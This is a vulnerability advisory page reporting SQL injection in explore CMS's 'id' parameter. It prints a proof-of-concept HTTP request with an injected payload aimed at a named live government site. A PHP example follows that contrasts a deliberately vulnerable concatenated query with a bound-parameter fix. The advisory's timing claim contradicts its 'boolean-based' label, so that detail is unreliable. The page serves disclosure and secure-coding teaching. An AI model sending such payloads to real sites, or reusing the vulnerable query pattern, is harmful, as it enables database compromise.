Explore CMS 1.0 SQL Injection

2022.04.13
Credit: Sajibe Kanti
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: explore CMS - Boolean Based SQL Injection
# Date: 19/03/2022
# Exploit Author: Sajibe Kanti
# Vendor Name : EXPLORE IT
# Vendor Homepage: https://exploreit.com.bd
# CVE: On Request

# POC

#SQL Injection

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. explore CMS is vulnerable to SQL injection in the 'id' parameter of the 'page' page.

#Steps to reproduce

The following URL is vulnerable to SQL injection in the 'id' field.

GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1
Host: www.gdc.gov.bd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320
Referer: https://www.gdc.gov.bd/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

HTTP/1.1 200 OK
content-encoding:
server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
date: Thu, 17 Mar 2022 07:27:21 GMT
vary: Accept-Encoding

10.3.34-MariaDB

Server accepts the payload and the response gets delayed by 7 seconds.

#Impact

An attacker can compromise the database of the application by manual methods or by automated tools such as SQLmap.

--
Thanks
Sajibe Kanti
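
The root cause behind this class of finding and its fix, as an added example that is not code from explore CMS or from the advisory's author: the table, column and function names are hypothetical, and an in-memory SQLite database (PDO sqlite driver assumed available) stands in for the MariaDB backend. It passes the URL-decoded 'id' value from the reported request through a concatenated query and through a validated, bound one.

```php
<?php
declare(strict_types=1);

// Constructed sample data; schema and names are hypothetical, not from explore CMS.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO pages (id, title) VALUES (1, 'Home'), (2, 'About'), (3, 'Draft')");

// Vulnerable pattern: the request value becomes part of the SQL text,
// so quotes inside it change the structure of the WHERE clause.
function page_titles_concat(PDO $db, string $id): array
{
    $sql = "SELECT title FROM pages WHERE id = '" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: reject anything that is not a positive integer,
// then pass the value as a typed bound parameter, never as SQL text.
function page_titles_bound(PDO $db, string $id): array
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return []; // the caller should answer 400 or 404 here
    }
    $stmt = $db->prepare('SELECT title FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// URL-decoded value of the 'id' parameter from the request in the advisory.
$reported = rawurldecode('1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns');

// Compare how many rows each query style returns for a normal id and the reported one.
foreach (['1', $reported] as $id) {
    printf("id=%-28s concat=%d row(s)  bound=%d row(s)\n", $id,
        count(page_titles_concat($db, $id)), count(page_titles_bound($db, $id)));
}
```

With the concatenated query the reported value matches every row in the table; the bound version rejects it before any SQL is executed.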


Copyright 2024, cxsecurity.com

 
